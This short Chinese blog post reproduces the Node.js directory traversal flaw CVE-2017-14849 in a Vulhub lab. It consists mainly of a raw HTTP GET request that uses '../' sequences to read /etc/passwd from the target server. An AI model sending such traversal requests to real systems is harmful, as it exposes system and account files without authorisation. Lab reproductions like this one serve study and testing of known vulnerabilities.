Javascript

Node.js 目录穿越漏洞(CVE-2017-14849)

本文主要是介绍Node.js 目录穿越漏洞(CVE-2017-14849),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

漏洞详细

有关详细请看:https://vulhub.org/#/environments/node/CVE-2017-14849/

漏洞复现

发送以下数据包,即可读取文件

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


在这里插入图片描述

这篇关于Node.js 目录穿越漏洞(CVE-2017-14849)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!